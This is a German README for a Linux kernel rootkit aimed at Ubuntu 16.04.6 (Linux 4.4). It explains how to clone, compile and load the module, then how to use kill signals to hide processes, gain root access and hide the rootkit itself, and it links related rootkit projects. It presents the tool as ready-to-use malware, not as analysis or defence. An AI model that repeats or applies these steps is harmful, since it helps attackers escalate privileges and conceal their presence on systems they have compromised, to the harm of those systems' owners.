
Ein Rootkit für ubuntu-16.04.6 (Linux 4.4). Kann einen Prozess verbergen, Root-Zugriff gewähren und sich selbst verbergen.
Dies ist ein Rootkit, das auf ubuntu-16.04.6-desktop-amd64 (Linux 4.4) getestet wurde, aber es sollte einfach auf verschiedene Kernelversionen portierbar sein.
Link zum Video --> https://drive.google.com/file/d/1yDktAg9vIPBH3OPEBYset9OdQb0LMevA/view?usp=sharing
Klone das Repository
git clone https://github.com/Asekon/RootKit
Wechsle in den Ordner
cd RootKit
Kompiliere
sudo make
Füge das Modul als root in den Kernel ein
sudo insmod RootKit.ko
Prozess (un)sichtbar machen (Beispiel: PID 500)
kill -0 500
Root-Zugriff erlangen (du kannst jede beliebige PID eingeben, sie muss nicht 0 sein)
kill -1 0
Rootkit (un)sichtbar machen (du kannst jede beliebige PID eingeben, sie muss nicht 0 sein)
kill -2 0
entferne das Modul als root aus dem Kernel (stelle sicher, dass es zuerst in der Modulliste sichtbar ist)
sudo rmmod RootKit
https://en.wikipedia.org/wiki/Rootkit
http://dandylife.net/blog/archives/304
https://github.com/nurupo/rootkit
https://github.com/f0rb1dd3n/Reptile
https://github.com/m0nad/Diamorphine
http://derekmolloy.ie/writing-a-linux-kernel-module-part-1-introduction/
http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html
https://yassine.tioual.com/index.php/2017/01/10/hiding-processes-for-fun-and-profit/